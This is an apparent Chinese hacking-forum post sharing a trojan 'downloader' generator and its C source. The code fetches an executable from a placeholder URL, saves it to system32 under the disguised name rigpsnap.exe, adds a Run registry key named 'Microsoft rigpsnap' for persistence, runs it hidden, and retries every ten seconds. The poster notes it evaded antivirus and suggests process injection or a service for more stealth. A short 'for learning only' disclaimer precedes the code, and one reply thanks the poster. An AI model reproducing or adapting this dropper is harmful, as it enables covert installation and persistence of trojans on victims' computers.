下载者(入门学习版)
在生成器的地址栏中输入要下载运行的木马点生成就ok
生成的下载者只有2k大小
在xp下测试卡吧没有任何反应........
其它的系统我没有试过,有什么问题请跟帖告诉我!。。。。。。。。。3Q
[attach]5001[/attach]
~~~~~~~~~~~
下载者运行后如果成功下载
就会在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
下生成Microsoft rigpsnap项自启
(其实下载成功后可以不用写入注册表,太容易被发现了!可以插入进程或写成服务!!
这个只供学习!)
下载的木马会在WINDOWS\system32下,重新命名为rigpsnap.exe
如果由于没有联网或地址错误
下载者就会等待10秒后再尝试下载
如此反复,知道下载成功
下载者的关键代码如下![code]void main()
{
HKEY MyKey;
char stypath[256];
char downURL[50]="http://xxx.xxx.com/xxx/xxx.exe\x00";//木马地址
GetSystemDirectory(stypath,256);
strcat(stypath,"\\rigpsnap.exe");//下载到系统\system32目录下
leep:HRESULT hRet=URLDownloadToFile(0,downURL,stypath,0,0);
if(hRet==S_OK)
{
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",(DWORD)NULL,KEY_ALL_ACCESS,&MyKey);
RegSetValueEx (MyKey,"Microsoft rigpsnap",(DWORD)NULL,REG_SZ,( CONST BYTE * )&stypath,strlen(stypath));//自启
ShellExecute(NULL,"open",stypath,NULL,NULL,SW_HIDE);
}
else
{
Sleep(10000);
goto leep;
}
exit(0);
}[/code] 谢谢,我已经下载好了!~!
页:
[1]